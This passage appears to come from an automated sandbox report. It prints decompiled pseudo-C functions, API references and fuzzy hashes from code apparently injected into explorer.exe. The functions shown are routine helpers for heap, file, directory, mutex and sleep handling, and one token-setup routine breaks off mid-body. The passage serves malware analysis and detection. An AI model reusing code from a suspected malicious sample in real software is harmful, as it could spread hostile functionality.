                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A8BF4 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8BF4(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E007AA456(_t9);
						}
					} else {
						_t4 = E007AA43D(_t9);
					}
					E007A8D6D(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0x7bf900, 0, _t9); // executed
				}
				return _t3;
			}






                                                                                                                                                                        0x007a8bf7
                                                                                                                                                                        0x007a8bfc
                                                                                                                                                                        0x007a8c42
                                                                                                                                                                        0x007a8c42
                                                                                                                                                                        0x007a8bff
                                                                                                                                                                        0x007a8c03
                                                                                                                                                                        0x007a8c05
                                                                                                                                                                        0x007a8c08
                                                                                                                                                                        0x007a8c0e
                                                                                                                                                                        0x007a8c1c
                                                                                                                                                                        0x007a8c20
                                                                                                                                                                        0x007a8c20
                                                                                                                                                                        0x007a8c10
                                                                                                                                                                        0x007a8c11
                                                                                                                                                                        0x007a8c16
                                                                                                                                                                        0x007a8c29
                                                                                                                                                                        0x007a8c3a
                                                                                                                                                                        0x007a8c3a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                        • Opcode ID: 564d06c554c04aef6c20d1b77815a6b0e67fed73b792230cc9e3d6623cb55a8c
                                                                                                                                                                        • Instruction ID: 3892f46dc0b01d3d65142893b65d18f6ec438962c8b64c36e6608483a5f92268
                                                                                                                                                                        • Opcode Fuzzy Hash: 564d06c554c04aef6c20d1b77815a6b0e67fed73b792230cc9e3d6623cb55a8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F0A731A02514ABDAA13B28AC49F6A77589F87B30F144391F525D71D1DF6CAC404AF7
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB2BA Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB2BA(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t6 + 0x88))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                                                                                                                                                                        0x007ab2c4
                                                                                                                                                                        0x007ab2d8
                                                                                                                                                                        0x007ab2dd
                                                                                                                                                                        0x007ab2e6
                                                                                                                                                                        0x007ab2e8
                                                                                                                                                                        0x007ab2f2
                                                                                                                                                                        0x007ab2f2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab2f8
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,007A9552), ref: 007AB2D5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: a7ee4778c90aefce8fc62a37278a801d41fa61bfc4b98000a501d23cce294a1b
                                                                                                                                                                        • Instruction ID: 5cd8de3d4a8f5020eb9d63ee9f48dd2eb12dd9f46575bf8d26480bbc93c158e9
                                                                                                                                                                        • Opcode Fuzzy Hash: a7ee4778c90aefce8fc62a37278a801d41fa61bfc4b98000a501d23cce294a1b
                                                                                                                                                                        • Instruction Fuzzy Hash: E3E0E5B2700114BEE22016AAAC89FAB66ACE7CABB9F118371F665D6191C6249C4142A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB467 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AB467(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E007AB2BA(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E007AB31F(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                                                                                                                                                                        0x007ab470
                                                                                                                                                                        0x007ab471
                                                                                                                                                                        0x007ab476
                                                                                                                                                                        0x007ab47a
                                                                                                                                                                        0x007ab489
                                                                                                                                                                        0x007ab491
                                                                                                                                                                        0x007ab49e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab4a1
                                                                                                                                                                        0x007ab495
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab495
                                                                                                                                                                        0x00000000

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 10ba9805bed1e1e4c4e5ca4cd5d02011e00ba5baa56e6fe4fe76ce633b4a710e
                                                                                                                                                                        • Instruction ID: b3548f7149db5f03b72e1fb366b3df81cdf3ecf5deb6827ae1e60123487f71a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 10ba9805bed1e1e4c4e5ca4cd5d02011e00ba5baa56e6fe4fe76ce633b4a710e
                                                                                                                                                                        • Instruction Fuzzy Hash: 59E09232604665ABCB115A68AC15E9E3749EFCE770B208712F9258B2D3DB38D90142D0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AC164 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E007AC164(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x7bf818; // 0xeaf6c8
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xc8))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x7bf818; // 0xeaf6c8
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xcc))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t12);
					return _t13;
				}
				return _t5;
			}








                                                                                                                                                                        0x007ac164
                                                                                                                                                                        0x007ac16c
                                                                                                                                                                        0x007ac171
                                                                                                                                                                        0x007ac177
                                                                                                                                                                        0x007ac17b
                                                                                                                                                                        0x007ac17d
                                                                                                                                                                        0x007ac182
                                                                                                                                                                        0x007ac18b
                                                                                                                                                                        0x007ac18f
                                                                                                                                                                        0x007ac18f
                                                                                                                                                                        0x007ac197
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ac19a
                                                                                                                                                                        0x007ac19e

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,007A42E1), ref: 007AC197
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: e90e2305056be8c8a0a8e109809275cc99ad591c81ab72ef58618c2f5859cc6f
                                                                                                                                                                        • Instruction ID: 895c58a96f7cfca53e382ac038189fff34c4262c54956f3cb45770cc9c0d6fd4
                                                                                                                                                                        • Opcode Fuzzy Hash: e90e2305056be8c8a0a8e109809275cc99ad591c81ab72ef58618c2f5859cc6f
                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE048323015216BD3114765FC4DFA77BA9DBCAE51B058378F509C7151CB248843C7E4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A3067 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E007A3067(WCHAR* __ecx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _t1;
				int _t3;
				void* _t5;
				WCHAR* _t8;

				_t8 = __ecx;
				_t1 = E007AC093(__ecx);
				if(_t1 != 0) {
					L6:
					return 0;
				} else {
					_t3 = CreateDirectoryW(__ecx, _t1); // executed
					if(_t3 != 0) {
						if(E007AC093(_t8) != 0) {
							goto L6;
						} else {
							_push(0xfffffffd);
							goto L3;
						}
					} else {
						_push(0xfffffffe);
						L3:
						_pop(_t5);
						return _t5;
					}
				}
			}







                                                                                                                                                                        0x007a3068
                                                                                                                                                                        0x007a306a
                                                                                                                                                                        0x007a3071
                                                                                                                                                                        0x007a3093
                                                                                                                                                                        0x007a3096
                                                                                                                                                                        0x007a3073
                                                                                                                                                                        0x007a3075
                                                                                                                                                                        0x007a307d
                                                                                                                                                                        0x007a308d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a308f
                                                                                                                                                                        0x007a308f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a308f
                                                                                                                                                                        0x007a307f
                                                                                                                                                                        0x007a307f
                                                                                                                                                                        0x007a3081
                                                                                                                                                                        0x007a3081
                                                                                                                                                                        0x007a3083
                                                                                                                                                                        0x007a3083
                                                                                                                                                                        0x007a307d

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007AC093: GetFileAttributesW.KERNELBASE(00000000,007A5445,00000000,00000000), ref: 007AC099
                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,007A328A,00000000), ref: 007A3075
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesCreateDirectoryFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3401506121-0
                                                                                                                                                                        • Opcode ID: e19ff73db955005fef388af90ae6833a573276f2b5fb2d863e2b0d01b7df3b77
                                                                                                                                                                        • Instruction ID: b971270eb213075591304f5b820d7f0aa7683040c535dab66708d1ef749b4113
                                                                                                                                                                        • Opcode Fuzzy Hash: e19ff73db955005fef388af90ae6833a573276f2b5fb2d863e2b0d01b7df3b77
                                                                                                                                                                        • Instruction Fuzzy Hash: 91D05E21208221A52A216A797C08AAB128A8DD323472403B6F826D16C0EA0CCE410881
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AA108 Relevance: 1.5, APIs: 1, Instructions: 23synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AA108() {
				signed int _t3;

				_t3 = CreateMutexA(0, 0, 0);
				 *0x7bf904 = _t3;
				if(_t3 == 0) {
					L3:
					return _t3 | 0xffffffff;
				} else {
					_t3 = E007A8BDE(0x1000);
					 *0x7bf908 = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						 *0x7bf90c = 0;
						return 0;
					}
				}
			}




                                                                                                                                                                        0x007aa113
                                                                                                                                                                        0x007aa119
                                                                                                                                                                        0x007aa120
                                                                                                                                                                        0x007aa140
                                                                                                                                                                        0x007aa144
                                                                                                                                                                        0x007aa122
                                                                                                                                                                        0x007aa127
                                                                                                                                                                        0x007aa12c
                                                                                                                                                                        0x007aa134
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa136
                                                                                                                                                                        0x007aa136
                                                                                                                                                                        0x007aa13f
                                                                                                                                                                        0x007aa13f
                                                                                                                                                                        0x007aa134

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00000000,00000001,007A5C6F,?,007A6009), ref: 007AA113
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateCreateHeapMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3814785936-0
                                                                                                                                                                        • Opcode ID: e8e4cddedc58dba5221e62048c2ac1e69ab43bdd6d95b9718d1fcafd715af275
                                                                                                                                                                        • Instruction ID: b6adb80eeba1215f227e7161f11d55094222e13a1543c5a5574efc3d321e1e81
                                                                                                                                                                        • Opcode Fuzzy Hash: e8e4cddedc58dba5221e62048c2ac1e69ab43bdd6d95b9718d1fcafd715af275
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE086711065297A93505F7ABC04FC33B94EB427707008335F014C5190DB3CE441C7E5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A5BEA Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                        			E007A5BEA(void* __edx) {
				void* _t2;
				void* _t4;
				void* _t11;

				_t11 = __edx;
				_t2 = E007AA96C(0x3e); // executed
				if(_t2 == 0xffffffff) {
					while(1) {
						_t4 = E007AF457(_t11); // executed
						_push(1);
						if(_t4 > 0) {
							break;
						}
						SleepEx(0x3e8, ??);
					}
					_push(0x3f);
					E007AAA65();
				}
				return 0;
			}






                                                                                                                                                                        0x007a5bea
                                                                                                                                                                        0x007a5bec
                                                                                                                                                                        0x007a5bf5
                                                                                                                                                                        0x007a5c09
                                                                                                                                                                        0x007a5c09
                                                                                                                                                                        0x007a5c0e
                                                                                                                                                                        0x007a5c12
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5c03
                                                                                                                                                                        0x007a5c03
                                                                                                                                                                        0x007a5c14
                                                                                                                                                                        0x007a5c16
                                                                                                                                                                        0x007a5c1c
                                                                                                                                                                        0x007a5c1f

                                                                                                                                                                        APIs
                                                                                                                                                                        • SleepEx.KERNELBASE(000003E8,00000001), ref: 007A5C03
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 379ad62fff78c9fca127673d2c78c6a39ef72c5fe23eba3c93c0d6df864c2158
                                                                                                                                                                        • Instruction ID: ab824983d638e6d09c25e320d38570724e1871e8f3d7ed1957a826741e9ae602
                                                                                                                                                                        • Opcode Fuzzy Hash: 379ad62fff78c9fca127673d2c78c6a39ef72c5fe23eba3c93c0d6df864c2158
                                                                                                                                                                        • Instruction Fuzzy Hash: 86D05B622447429AE10563B46D0BF5512845BC2B70F208335F311CD0D2DF588580C736
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB2FE Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E007AB2FE(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                                                                                                                                                                        0x007ab312
                                                                                                                                                                        0x007ab315
                                                                                                                                                                        0x007ab31a
                                                                                                                                                                        0x007ab31e

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,007AB3E6,00000000,00000400,00000000,00000000,?,007B0BBE,00000000,00000000), ref: 007AB312
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 63d9c5b6a56aa0ff83c3e8320f974b020df148baf94d4186c019922f9c9cdb7c
                                                                                                                                                                        • Instruction ID: d76f277cf009c0e7db6f4d2dec3d48cf52379f16e8efa4b2d52babe21a986810
                                                                                                                                                                        • Opcode Fuzzy Hash: 63d9c5b6a56aa0ff83c3e8320f974b020df148baf94d4186c019922f9c9cdb7c
                                                                                                                                                                        • Instruction Fuzzy Hash: BCD012B13601007EFB1C8B24DC57F71339CD704701F11426C7A02D60E0C669D9448714
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A5057 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E007A5057() {
				signed int _t3;
				signed int _t5;

				_t3 = FindCloseChangeNotification( *0x7bf8e0);
				asm("sbb eax, eax");
				_t5 =  !( ~_t3);
				 *0x7bf8e0 =  *0x7bf8e0 & _t5;
				return _t5;
			}





                                                                                                                                                                        0x007a5062
                                                                                                                                                                        0x007a5067
                                                                                                                                                                        0x007a5069
                                                                                                                                                                        0x007a506b
                                                                                                                                                                        0x007a5071

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(007A5619,?,?,?,?,?,?,?,?,00000000,00000000), ref: 007A5062
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: c3f2672b00983ca68ed81a22b7a75b3398994c890ca7ca961dadab8e16edb31d
                                                                                                                                                                        • Instruction ID: e251ce550efe5ae7ca21c8e2e182e2e95347da389cefb37b580cbacaf16b81b4
                                                                                                                                                                        • Opcode Fuzzy Hash: c3f2672b00983ca68ed81a22b7a75b3398994c890ca7ca961dadab8e16edb31d
                                                                                                                                                                        • Instruction Fuzzy Hash: BCC048752A00018F8B00AB79FC06E6036E0F704B42300ABB0E001C2070DB2D8840AA08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AC093 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007AC093(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



                                                                                                                                                                        0x007ac0a9

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000,007A5445,00000000,00000000), ref: 007AC099
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 6765c3ef2bfaac3f0ea8b84081d3b23634603259e84cd564998e944fef7e873e
                                                                                                                                                                        • Instruction ID: eb7b0cbda10cfc3b4f88ea1b71d492454cb2ae4c151d6022b66d7d4ce336c93f
                                                                                                                                                                        • Opcode Fuzzy Hash: 6765c3ef2bfaac3f0ea8b84081d3b23634603259e84cd564998e944fef7e873e
                                                                                                                                                                        • Instruction Fuzzy Hash: FFB092B62204014BC7184738AC89A9D3290AB08621B2587B8B123C60E0DB34C9919B00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A8BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x7bf900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                        0x007a8bec
                                                                                                                                                                        0x007a8bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 9014c9547bc267683eeed7a1bb7ab281b1fd7c0fb5cf855a5fe67b5e1e8bb731
                                                                                                                                                                        • Instruction ID: 76e8a72f2bf52b1c2372599d529fb00bef28c089a970f4ca1f292916572c70e4
                                                                                                                                                                        • Opcode Fuzzy Hash: 9014c9547bc267683eeed7a1bb7ab281b1fd7c0fb5cf855a5fe67b5e1e8bb731
                                                                                                                                                                        • Instruction Fuzzy Hash: B4B0923108020CBBDB012BA9EC05F843F29F705A51F008120F70C44070CB6674209B88
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A8BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E007A8BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x7bf900 = _t1;
				return _t1;
			}




                                                                                                                                                                        0x007a8bd2
                                                                                                                                                                        0x007a8bd8
                                                                                                                                                                        0x007a8bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,007A6502), ref: 007A8BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        • Opcode ID: 774ba1e2a9fe08aadb59999c3466c94f0b144e781dcb81763793ffefa8cd6065
                                                                                                                                                                        • Instruction ID: e51b7fed3d3fbe0fff224aca3c9db9bd01d5f4269aaccaabf7fe036bdf41b34d
                                                                                                                                                                        • Opcode Fuzzy Hash: 774ba1e2a9fe08aadb59999c3466c94f0b144e781dcb81763793ffefa8cd6065
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AB0127038530066E6101B205C4AF003510A380F02F108210F715D81E0D7A43000950C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ACB77 Relevance: 1.4, APIs: 1, Instructions: 149memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E007ACB77() {
				char _v8;
				char _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t89;
				void* _t92;

				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				_t92 = 0;
				_v20 = 0x100;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				E007A8D6D( &_v96, 0, 0x20);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(1);
				_push( &_v24);
				_t57 =  *0x7bf820; // 0xeaf8b8
				if( *((intOrPtr*)(_t57 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t66 =  *0x7bf820; // 0xeaf8b8
						 *((intOrPtr*)(_t66 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t64 =  *0x7bf820; // 0xeaf8b8
						 *((intOrPtr*)(_t64 + 0x10))(_v12);
					}
					if(_t92 != 0) {
						_t62 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t62 + 0x34))(_t92);
					}
					if(_v16 != 0) {
						_t60 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t60 + 0x34))(_v16);
					}
					L22:
					return _t92;
				}
				_v68 = _v12;
				_t69 =  *0x7bf81c; // 0x7d0000
				_t88 = 2;
				_v96 = 0x1fffff;
				_v92 = _t88;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t69 + 4)) != 6 ||  *((intOrPtr*)(_t69 + 8)) < _t88) {
					if( *((intOrPtr*)(_t69 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
